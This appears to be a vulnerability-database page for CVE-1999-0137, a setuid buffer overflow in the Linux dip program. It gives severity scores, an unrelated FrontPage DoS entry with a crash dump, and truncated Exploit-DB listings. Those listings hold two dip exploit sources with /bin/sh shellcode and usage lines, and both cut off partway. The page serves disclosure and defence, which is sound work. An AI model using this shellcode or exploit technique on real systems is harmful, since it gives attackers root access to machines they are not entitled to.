CVE-1999-0137
published 1996-07-09CVE-1999-0137: The dip program on many Linux systems allows local users to gain root access via a buffer overflow.
PriorityP425high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
0.86%
53.9th percentile
The dip program on many Linux systems allows local users to gain root access via a buffer overflow.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fred_n_van_kempen | dip | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service
exploitdb·1999-08-08
CVE-1999-0681 Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service
Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service
---
source: https://www.securityfocus.com/bid/568/info
A 'GET' request for a URL longer than 166 characters will overflow a buffer and cause the web server to crash with the following or similar error message:
VHTTPD32 caused an invalid page fault in
module VHTTPD32.EXE at 0137:0040aaed.
Registers:
EAX=010d7740 CS=0137 EIP=0040aaed EFLGS=00010202
EBX=00000000 SS=013f ESP=010d53d0 EBP=010d0074
ECX=010d7740 DS=013f ESI=010d7740 FS=13c7
EDX=000000a8 ES=013f EDI=bff92ac1 GS=0000
Bytes at CS:EIP:
ff 75 10 56 68 94 01 00 00 eb 1c 68 00 24 40 00
Stack dump:
00000010 010d7740 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000
https://gitlab.com/exploi
Exploit-DB
Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (1)
exploitdb·1998-05-05
CVE-1999-0137 Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (1)
Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/86/info
A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c':
sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);
----- dip-exp.c -----
/*
dip 3.3.7o buffer overflow exploit for Linux. (May 7, 1998)
coded by jamez. e-mail: [email protected]
thanks to all ppl from uground.
usage:
gcc -o dip-exp dip3.3.7o-exp.c
./dip-exp offset (-100 to 100. probably 0. tested on slack 3.4)
*/
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xf
Exploit-DB
Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (2)
exploitdb·1998-05-05
CVE-1999-0137 Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (2)
Fred N. van Kempen dip 3.3.7 - Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/86/info
A buffer overflow resides in 'dip-3.3.7o' and derived programs. This is a problem only on systems where 'dip' is installed setuid. The culpable code is an 'sprintf()' in line 192 in 'main.c':
sprintf(buf, "%s/LCK..%s", _PATH_LOCKD, nam);
/* Linux x86 dip 3.3.7p exploit by pr10n */
#include
#define NOP 0x90
/*thanks to hack.co.za*/
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
"\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
"\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";
unsigned long get_sp(void){ __asm__("movl %esp, %eax");}
main(int argc, char *argv[]){
char buf[136];
int i;
int off
No writeups or analysis indexed.
1996-07-09
Published